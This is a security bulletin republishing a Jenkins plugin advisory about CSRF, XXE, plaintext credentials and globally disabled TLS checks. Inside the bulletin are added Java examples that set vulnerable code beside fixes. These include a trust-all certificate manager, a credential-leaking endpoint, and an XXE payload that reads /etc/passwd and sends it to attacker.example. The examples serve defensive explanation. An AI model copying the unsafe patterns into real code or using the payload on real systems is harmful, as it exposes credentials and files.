-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2019.1455.2
                     Jenkins Security Advisory 2019-04-30
                                  1 May 2019

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Jenkins plugins
Publisher:         Jenkins
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Cross-site Request Forgery -- Remote with User Interaction
                   Reduced Security           -- Remote/Unauthenticated
                   Access Confidential Data   -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2019-10307 CVE-2019-10308 CVE-2019-10317 CVE-2019-10309
                   CVE-2019-10310 CVE-2019-10311 CVE-2019-10312 CVE-2019-10318
                   CVE-2019-10313 CVE-2019-10314 CVE-2019-10315 CVE-2019-10316

Original Bulletin:
   https://jenkins.io/security/advisory/2019-04-30/

Revision History:  May    1 2019: Security Advisory Released
                   April 30 2019: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

Jenkins Security Advisory 2019-04-30

This advisory announces vulnerabilities in the following Jenkins deliverables:

  * Ansible Tower Plugin
  * Aqua MicroScanner Plugin
  * Azure AD Plugin
  * GitHub Authentication Plugin
  * Koji Plugin
  * Self-Organizing Swarm Plug-in Modules Plugin
  * SiteMonitor Plugin
  * Static Analysis Utilities Plugin
  * Twitter Plugin

Descriptions

CSRF vulnerability and missing permission check allowed changing default graph
configuration in Static Analysis Utilities Plugin

SECURITY-1100 / CVE-2019-10307 (CSRF) and CVE-2019-10308 (permission check)

Static Analysis Utilities Plugin has the capability to allow other plugins to
display trend graphs for their static analysis results. Static Analysis
Utilities Plugin provides the configuration form for the default settings of
each graph.
The configuration form and form submission handler did not perform a
permission check, allowing attackers with Job/Read access to change the
per-job graph configuration defaults for all users.

Additionally, the form submission handler did not require POST requests,
resulting in a cross-site request forgery vulnerability.

Static Analysis Utilities Plugin now requires Job/Configure permission and
POST requests to configure the per-job graph defaults for all users.

SiteMonitor Plugin globally and unconditionally disables SSL/TLS certificate
validation

SECURITY-930 / CVE-2019-10317

SiteMonitor Plugin unconditionally disables SSL/TLS certificate validation
for the entire Jenkins master JVM.

SiteMonitor Plugin no longer does that. Instead, it now has an opt-in option
to ignore SSL/TLS errors for each site check individually.

XXE vulnerability via UDP broadcast response in Self-Organizing Swarm Plug-in
Modules Plugin client

SECURITY-1252 / CVE-2019-10309

Self-Organizing Swarm Plug-in Modules Plugin allows clients to auto-discover
Jenkins instances on the same network through a UDP discovery request.
Responses to this request are XML documents.

Self-Organizing Swarm Plug-in Modules Plugin does not configure the XML
parser in a way that would prevent XML External Entity (XXE) processing.

This allows unauthenticated attackers on the same network to have Swarm
clients parse a maliciously crafted XML response that uses external entities
to read arbitrary files from the Swarm client or to mount denial-of-service
attacks.

As of publication of this advisory, there is no fix.

CSRF vulnerability and missing permission check in Ansible Tower Plugin
allowed capturing credentials

SECURITY-1355 (1) / CVE-2019-10310 (CSRF) and CVE-2019-10311 (permission
check)

Ansible Tower Plugin did not perform permission checks on a method
implementing form validation.
This allowed users with Overall/Read access to Jenkins to connect to an
attacker-specified URL using attacker-specified credential IDs obtained
through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests,
resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer
permission.

Users with Overall/Read access are able to enumerate credential IDs in
Ansible Tower Plugin

SECURITY-1355 (2) / CVE-2019-10312

Ansible Tower Plugin provides a list of applicable credential IDs to allow
users configuring the plugin to select the one to use.

This functionality did not check permissions, allowing any user with
Overall/Read permission to get a list of valid credential IDs. Those could be
used as part of an attack to capture the credentials using another
vulnerability.

Enumeration of credential IDs in this plugin now requires Overall/Administer
permission.

Azure AD Plugin stored credentials in plain text

SECURITY-1390 / CVE-2019-10318

Azure AD Plugin stored the client secret unencrypted in the global config.xml
configuration file on the Jenkins master. These credentials could be viewed
by users with access to the master file system.

Azure AD Plugin now stores the client secret encrypted.

Twitter Plugin stores credentials in plain text

SECURITY-1143 / CVE-2019-10313

Twitter Plugin stores credentials unencrypted in its global configuration
file on the Jenkins master. These credentials could be viewed by users with
access to the master file system.

As of publication of this advisory, there is no fix.

Koji Plugin globally and unconditionally disables SSL/TLS certificate
validation

SECURITY-936 / CVE-2019-10314

Koji Plugin unconditionally disables SSL/TLS certificate validation for the
entire Jenkins master JVM.

As of publication of this advisory, there is no fix.
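The following is an added example and is not code from Ansible Tower Plugin or any other plugin named in this advisory. It shows the two defects described for SECURITY-1355 above, a form-validation method reachable by GET with no permission check and a credentials drop-down that hands the list of valid IDs to every Overall/Read user, beside the hardening the advisory describes (POST only, Overall/Administer required). The class TowerGlobalConfig, its method names and the URL form are hypothetical; the Jenkins core, Stapler and Credentials Plugin APIs it calls are the real ones.

```java
package example;

import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardListBoxModel;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.URIRequirementBuilder;

import hudson.Extension;
import hudson.model.Item;
import hudson.security.ACL;
import hudson.util.FormValidation;
import hudson.util.ListBoxModel;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;

/**
 * Hypothetical global configuration (added example, not plugin code). Stapler
 * exposes doTestConnection(...) as .../descriptorByName/example.TowerGlobalConfig/testConnection
 * and doFillCredentialsIdItems() as .../fillCredentialsIdItems to anyone who can
 * reach the web UI, so each web-bound method must carry its own checks.
 */
@Extension
public class TowerGlobalConfig extends GlobalConfiguration {

    /* ---- BEFORE: the shape of SECURITY-1355 (1) and (2) ---- */

    /** Reachable by GET and by anyone with Overall/Read. Pointing url at a host
     *  the attacker controls and naming a credentialsId (learnt from the method
     *  below) makes Jenkins send that credential's username and password there. */
    public FormValidation doTestConnectionUnsafe(@QueryParameter String url,
                                                 @QueryParameter String credentialsId) {
        return connect(url, credentialsId);
    }

    /** Returns every matching credential ID to every Overall/Read user. */
    public ListBoxModel doFillCredentialsIdItemsUnsafe() {
        return new StandardListBoxModel()
                .includeAs(ACL.SYSTEM, Jenkins.get(), StandardUsernamePasswordCredentials.class);
    }

    /* ---- AFTER: what the advisory says the fixed release does ---- */

    @RequirePOST  // a cross-site <img src=...> or auto-submitted GET can no longer trigger it
    public FormValidation doTestConnection(@QueryParameter String url,
                                           @QueryParameter String credentialsId) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);  // throws AccessDeniedException otherwise
        return connect(url, credentialsId);
    }

    public ListBoxModel doFillCredentialsIdItems(@AncestorInPath Item context,
                                                 @QueryParameter String credentialsId) {
        StandardListBoxModel result = new StandardListBoxModel();
        // Global form: only administrators may list IDs. Job form: require Configure on that job.
        boolean allowed = context == null
                ? Jenkins.get().hasPermission(Jenkins.ADMINISTER)
                : context.hasPermission(Item.CONFIGURE);
        if (!allowed) {
            return result.includeCurrentValue(credentialsId);  // keep the saved value, reveal nothing else
        }
        return result.includeEmptyValue()
                .includeAs(ACL.SYSTEM, context, StandardUsernamePasswordCredentials.class)
                .includeCurrentValue(credentialsId);
    }

    /** Shared by both variants: resolve the ID and authenticate to url with it. */
    private static FormValidation connect(String url, String credentialsId) {
        StandardUsernamePasswordCredentials c = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(StandardUsernamePasswordCredentials.class,
                        Jenkins.get(), ACL.SYSTEM, URIRequirementBuilder.fromUri(url).build()),
                CredentialsMatchers.withId(credentialsId));
        if (c == null) {
            return FormValidation.error("No such credentials");
        }
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
            String basic = c.getUsername() + ":" + c.getPassword().getPlainText();
            conn.setRequestProperty("Authorization", "Basic "
                    + Base64.getEncoder().encodeToString(basic.getBytes(StandardCharsets.UTF_8)));
            conn.setConnectTimeout(5_000);
            conn.setReadTimeout(5_000);
            return conn.getResponseCode() == 200
                    ? FormValidation.ok("Connected")
                    : FormValidation.error("HTTP " + conn.getResponseCode());
        } catch (IOException e) {
            return FormValidation.error(e, "Connection failed");
        }
    }
}
```

The two halves of the fix have to go together: `@RequirePOST` alone still lets any logged-in Overall/Read user call the endpoint directly, and the permission check alone still lets a cross-site GET fire it in the victim's browser. The credentials drop-down is the reconnaissance half of the attack, which is why the advisory treats its missing check as a vulnerability in its own right.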
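Added example, not code from SiteMonitor Plugin or Koji Plugin, for SECURITY-930 and SECURITY-936 above: the JVM-wide pattern the advisory describes beside the per-site opt-in that the fixed SiteMonitor release adopts. The class SiteCheck and the ignoreSslErrors flag are hypothetical; the javax.net.ssl calls are standard JDK.

```java
package example;

import java.io.IOException;
import java.net.URL;
import java.security.GeneralSecurityException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

/** Added example (hypothetical class), not plugin code. */
public final class SiteCheck {

    /** A trust manager that accepts any chain: no issuer check, no expiry check. */
    private static final TrustManager[] TRUST_EVERYTHING = { new X509TrustManager() {
        @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        @Override public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    } };

    private static SSLSocketFactory trustEverythingFactory() throws GeneralSecurityException {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, TRUST_EVERYTHING, null);
        return ctx.getSocketFactory();
    }

    /** BEFORE (the pattern behind SECURITY-930/936): process-wide defaults.
     *  Every HttpsURLConnection opened afterwards by any code in the master
     *  JVM, other plugins, update-centre checks, webhooks, SCM polling,
     *  now accepts any certificate for any hostname, and none of that code
     *  asked for it. */
    public static void disableValidationGlobally() throws GeneralSecurityException {
        HttpsURLConnection.setDefaultSSLSocketFactory(trustEverythingFactory());
        HttpsURLConnection.setDefaultHostnameVerifier((hostname, session) -> true);
    }

    /** AFTER: the relaxation is a per-site setting applied to this one
     *  connection object only; the JVM defaults are never touched. */
    public static int check(URL url, boolean ignoreSslErrors)
            throws IOException, GeneralSecurityException {
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        if (ignoreSslErrors) {
            conn.setSSLSocketFactory(trustEverythingFactory());
            conn.setHostnameVerifier((hostname, session) -> true);
        }
        conn.setRequestMethod("HEAD");
        conn.setConnectTimeout(5_000);
        conn.setReadTimeout(5_000);
        return conn.getResponseCode();
    }
}
```

Note that "ignore SSL errors" as implemented here disables both the chain check and hostname verification; the per-connection setters scope that loss to the one monitored site, which is the whole of the fix the advisory describes. Anything using a different HTTP client (Apache HttpClient, OkHttp) is unaffected by the `HttpsURLConnection` defaults either way, so the global variant is both dangerous and unreliable as a workaround.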
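Added example, not code from Self-Organizing Swarm Plug-in Modules Plugin, for SECURITY-1252 above: a client parsing a discovery response with a default DocumentBuilderFactory beside one configured so that a DOCTYPE carrying an external entity is rejected. The element names and both sample responses are constructed for this example; the XML feature URIs are the standard Xerces/JAXP ones.

```java
package example;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

/** Added example (hypothetical class), not plugin code. */
public final class DiscoveryResponse {

    /** Constructed sample of what a hostile host on the same LAN can answer
     *  to the UDP broadcast. With a default factory the entity is expanded
     *  and the file contents land in the element the client then uses. */
    static final String MALICIOUS =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE hudson [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n" +
        "<hudson><url>http://attacker.example/?leak=&xxe;</url></hudson>";

    /** Constructed sample of a normal reply. */
    static final String BENIGN =
        "<hudson><version>2.176.1</version><url>http://jenkins.internal:8080/</url></hudson>";

    /** BEFORE: stock factory. Unless the JDK has been hardened elsewhere it
     *  resolves SYSTEM entities and fetches external DTDs. */
    static DocumentBuilder lenientBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** AFTER: refuse any DOCTYPE; a discovery reply has no business carrying
     *  one. The remaining features cover parsers that ignore the first. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder();
    }

    /** Extract the master URL the client would connect to. */
    static String urlFrom(DocumentBuilder b, String xml) throws Exception {
        Document d = b.parse(new InputSource(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))));
        return d.getElementsByTagName("url").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(urlFrom(hardenedBuilder(), BENIGN));   // http://jenkins.internal:8080/
        try {
            urlFrom(hardenedBuilder(), MALICIOUS);
        } catch (SAXParseException e) {
            // Xerces reports that DOCTYPE is disallowed when the feature is set
            System.out.println("rejected: " + e.getMessage());
        }
        // urlFrom(lenientBuilder(), MALICIOUS) would instead return the URL
        // with the client's /etc/passwd spliced into the query string.
    }
}
```

Because the response arrives over UDP from an unauthenticated peer, there is nothing to authenticate it with; the parser configuration is the only control, which is why disallowing DOCTYPE outright is preferable to merely disabling entity expansion (the latter still leaves entity-expansion denial of service and external DTD fetches to worry about).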
CSRF vulnerability in OAuth callback in GitHub Authentication Plugin

SECURITY-443 / CVE-2019-10315

GitHub Authentication Plugin did not manage the state parameter of OAuth to
prevent CSRF.

This allowed an attacker to catch the redirect URL provided during the
authentication process using OAuth and send it to the victim. If the victim
was already connected to Jenkins, their Jenkins account would be attached to
the attacker's GitHub account.

The state parameter is now correctly managed.

Aqua MicroScanner Plugin stored credentials in plain text

SECURITY-1380 / CVE-2019-10316

Aqua MicroScanner Plugin stored credentials unencrypted in its global
configuration file on the Jenkins master. These credentials could be viewed
by users with access to the master file system.

Aqua MicroScanner Plugin now stores credentials encrypted.

Severity

  * SECURITY-443: Medium
  * SECURITY-930: Medium
  * SECURITY-936: Medium
  * SECURITY-1100: Medium
  * SECURITY-1143: Low
  * SECURITY-1252: Medium
  * SECURITY-1355 (1): Medium
  * SECURITY-1355 (2): Medium
  * SECURITY-1380: Low
  * SECURITY-1390: Low

Affected Versions

  * Ansible Tower Plugin up to and including 0.9.1
  * Aqua MicroScanner Plugin up to and including 1.0.5
  * Azure AD Plugin up to and including 0.3.3
  * GitHub Authentication Plugin up to and including 0.31
  * Koji Plugin up to and including 0.3
  * Self-Organizing Swarm Plug-in Modules Plugin up to and including 3.15
  * SiteMonitor Plugin up to and including 0.5
  * Static Analysis Utilities Plugin up to and including 1.95
  * Twitter Plugin up to and including 0.7

Fix

  * Ansible Tower Plugin should be updated to version 0.9.2
  * Aqua MicroScanner Plugin should be updated to version 1.0.6
  * Azure AD Plugin should be updated to version 0.3.4
  * GitHub Authentication Plugin should be updated to version 0.32
  * SiteMonitor Plugin should be updated to version 0.6
  * Static Analysis Utilities Plugin should be updated to version 1.96

These versions include fixes to the vulnerabilities described above.
All prior versions are considered to be affected by these vulnerabilities
unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following
plugins:

  * Koji Plugin
  * Self-Organizing Swarm Plug-in Modules Plugin
  * Twitter Plugin

Credit

The Jenkins project would like to thank the reporters for discovering and
reporting these vulnerabilities:

  * Daniel Beck, CloudBees, Inc. for SECURITY-930, SECURITY-936
  * Mark Combellack, CafeX Communications for SECURITY-1390
  * Oleg Nenashev, CloudBees, Inc. for SECURITY-1100
  * Peter Adkins of Cisco Umbrella for SECURITY-1252, SECURITY-1355 (1),
    SECURITY-1355 (2)

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If you do
not know who that is, please send an email to auscert@auscert.org.au and we
will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for
consequences which may arise from following or acting on information or
advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may not
be updated when updates to the original are made. If downloading at a later
date, it is recommended that the bulletin is retrieved directly from the
author's website to ensure that the information is still current.
Contact information for the authors of the original document is included in
the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIUAwUBXMjtfGaOgq3Tt24GAQjWlw/3daWOojn6MhBqtayQX1AgOH/p3TYpIb5m
SUznMIW1x0yUMA4MP0zFYkepBJXZINdXrvjb9fgmiy0J+p8j8kI9eL4d3e5aXt7y
DOjw4DkFEG4hTG1REbycGhi50I1+ZWk1GvQF9tNMyeow5Yvc/rykx65xH9ZaQ8kT
T/KUp0A3zEfxpP9kORwstvS3IcWJHh7/MP03nY1R6dXoNxlKGpEce8wNOFhCjFtc
qqQYs5oPzt7P01nlj4glj0dDW9iszUn164RmXXQM7fXHDuBQHJLPoqQRAHrhwjKw
jkLcAx0VKCz2sHl4jYPU/h8OWglRS/TMRe0hk7hGsn+KOzp5odBGT3fx9He3Vz/9
zirkVKILGDlUHVuqEJpf9p4rhw7GOHPx9nF7p5c6u0cJ1LzG3cwOpaYXQbARIRN9
U/4MY5eictqHBdpIT5X0N/fHEvrh2/3RRy9huQjUB+5GxPmyiBGzrNdA/tFa3XY9
9u3VakiXhCIijoh2Fl9EaC/aJLyTxfqO8Ybx2qRemz3yU/sDtxKXFzgfft5ftI5r
VryHU4kkcdoP9KFAX6BACDxcLvukFbs1OIvj5AfulRYd9X1Jd6VIKQD2wgdgU+zj
xLsRA2FBQ1Os1nUIji1MrEBvkGMh7nK+jQ8QU103OF7p+WeVEqI532QXBAiHNefc
32vrqQMP2g==
=GzaX
-----END PGP SIGNATURE-----